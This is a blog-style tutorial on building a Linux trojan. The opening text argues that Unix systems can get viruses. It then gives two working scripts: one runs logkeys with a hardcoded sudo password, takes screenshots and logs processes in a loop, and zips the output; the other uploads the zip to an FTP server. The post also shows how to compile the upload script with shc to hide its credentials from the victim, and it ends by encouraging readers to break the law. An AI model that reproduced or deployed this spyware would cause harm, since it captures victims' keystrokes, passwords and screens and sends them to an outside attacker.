Making A Linux Malware (Virus, Trojan, Worm, etc)

Share This:

The other day I read an article about the Mac OSX Trojan of 2012.  And even though despite what people may argue, it really isn’t the first. True Mac OSX has less viruses then M$ Winblows but it still has them. In fact I can count on my hands on my hands how many viruses are for Macs. But this is besides the point.

The point is Macs do get viruses. And so can pretty much any Unix based system. However it is in fact rare to get viruses with Unix based systems. The reason behind this is because with Unix systems you as in the user has to tell the OS every thing that it does. So you never worry about a ton of background stuff running.

Now your probably thinking to your self well I don’t the system to call the Kernel, then to call the initrd image so that way I can run the system. And if your using a GUI Desktop environment your probably thinking well I don’t tell GNOME, KDE, LXDE or what ever to start up.

Well you may be correct. And the reason for this is because the makers of the particular *nix system has added a script to tell those things to run. If you modify the script you can remove certain things from running. And some developers choose to let the user add extra things they will want to run at start up or on a login. Such Linux Distros that have such features are Ubuntu, Bennix, “Red Hat based systems (Fedora, Cent OS, Red Hat Enterprise).

Knowing this it is possible to create viruses for some Unix based systems. It’s just a point of knowing how. Another problem is that since a user has to tell the system everything to do. And that a user has to have root privileges to install programs. This means a user wouldn’t be able to get the virus unless he or she was a root user. This means the best route for Unix virus writer is to create Trojan to trick the user into user into installing the virus.

Here’s a quick and dirty Trojan virus I made. It has been tested on Ubuntu, Fedora and Bennix 10.10. This Trojan uses several other premade programs that have legitimate uses and uses them in a malicious manner. The programs that it uses are listed below.

  • logkeys (found in both Ubuntu Repo’s and Fedora Repos)
  • scrot (found in both Ubuntu and Fedora Repos)
  • FTP (ships with most Unix Systems)
  • PS (Ships with most Linux Systems)

If it isn’t already noticeable of what this virus will do. It pretty much logs key strokes, and takes screenshots every few seconds of the users screen.  It uses uses FTP to upload the information it collects to an FTP server. However this can also be done using SSH or having them emailed to you. But keep in mind this is just a quick and dirty Trojan. So we get the programs on the persons computer. Then we write the Trojan in two scripts. And hide them in special location on the computer.

The code for the first script is listed below. This script is bash script.

#!/bin/bash
cd /tmp
mkdir kl
cd /tmp/kl
mkdir screenshots
mkdir processes
touch kl.log
echo password | sudo -S logkeys --start --output /tmp/kl/kl.log
for (( ; ; ))
do
for count in {1..10}
do
scrot -q 100 /tmp/kl/screenshots/`date '+%H-%M-%Y-%m-%d'`.png
ps aux >> /tmp/kl/processes/log-`date '+%H-%M-%Y-%m-%d'`.txt
echo "$count round is done"
sleep 1
done
cd /tmp
echo password | sudo logkeys --kill
zip -r -9 logs-`date '+%Y-%m-%d'` /tmp/kl
sh $HOME/ftp.sh
cd /tmp/kl
echo password | sudo -S logkeys --start --output /tmp/kl/kl.log
done

The above code should be pretty self explanatory. Since this script collects quite a bit of date. We tell the script to store the data in the /tmp directory. This way it gets deleted when the it gets full or when the computer gets restarted.

The next script is a shell script. which gets called by the above script. This script is called ftp.sh.


#!/bin/sh
HOST='ftp.yoursite.com'
USER='username'
PASSWD='password'
FILE='*.zip'

ftp -in $HOST <quote USER $USER
quote PASS $PASSWD
cd www
binary
put $FILE
quit
END_SCRIPT
exit 0

Once again the above script is pretty self explanatory. Now since we would be typing in valuble information such as our ftp password, user name, and the ftp server. We may want to protect this script. But please keep in mind that FTP doesn’t encrypt information any how. Your at risk when using FTP either way. You may prefer to use SSH instead. Either way to protect this information from the user. We will compile the script into a binary file. To do this we will use shc.

For example we will compile the ftp.sh file like so.


shc  -f ftp.sh

That’s pretty much it. Have fun breaking the law. And don’t wine if you get caught. I will take no responsibility if you use anything I talked about on this post.